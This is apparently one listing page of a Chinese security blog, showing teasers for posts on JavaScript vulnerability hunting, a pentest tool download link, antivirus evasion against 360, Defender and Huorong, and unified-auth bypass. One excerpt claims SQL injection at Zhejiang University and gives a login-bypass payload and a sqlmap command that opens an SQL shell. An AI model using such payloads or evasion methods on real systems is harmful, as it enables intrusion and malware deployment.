最新发布第5页
cnvd通用漏洞-JS中漏洞挖掘
利用js在挖掘cnvd通用漏洞中的思路以及附带的实战案例。一、前言JS渗透测试是一种针对客户端JavaScript代码的安全测试方法,旨在发现和利用应用程序中潜在的安全漏洞。那么在本文中,我们不去...
渗透测试工具大全VStart跟在线工具大全ZSS
链接: https://pan.baidu.com/s/1ZpRGBiBo7zp8TL2D2Twe_w?pwd=i1it 提取码: i1it --来自百度网盘超级会员v7的分享
用简单的方式做好免杀
免杀这个东西,往深了做,可以做的很难,但是如果只是保持能过国内基本的,所谓360,Defender,火绒这三个经常在项目中遇到的杀软,还是相对简单的。要想简单,核心思路就是白加黑形式的分离免...
浙江大学存在SQL注入
万能密码进入后台,万能密码')or('a'='a 对登陆页面进行跑 sqlmappython sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell
统一认证系统的挖掘方法
在挖掘一些业务的时候,很多系统都会放在一个统一认证中去访问,你只有登录统一认证才能去访问某个系统,那么当我们在挖掘的时候,遇见这样的环境怎么办呢?当然是最简单的修改返回包查看是否可...










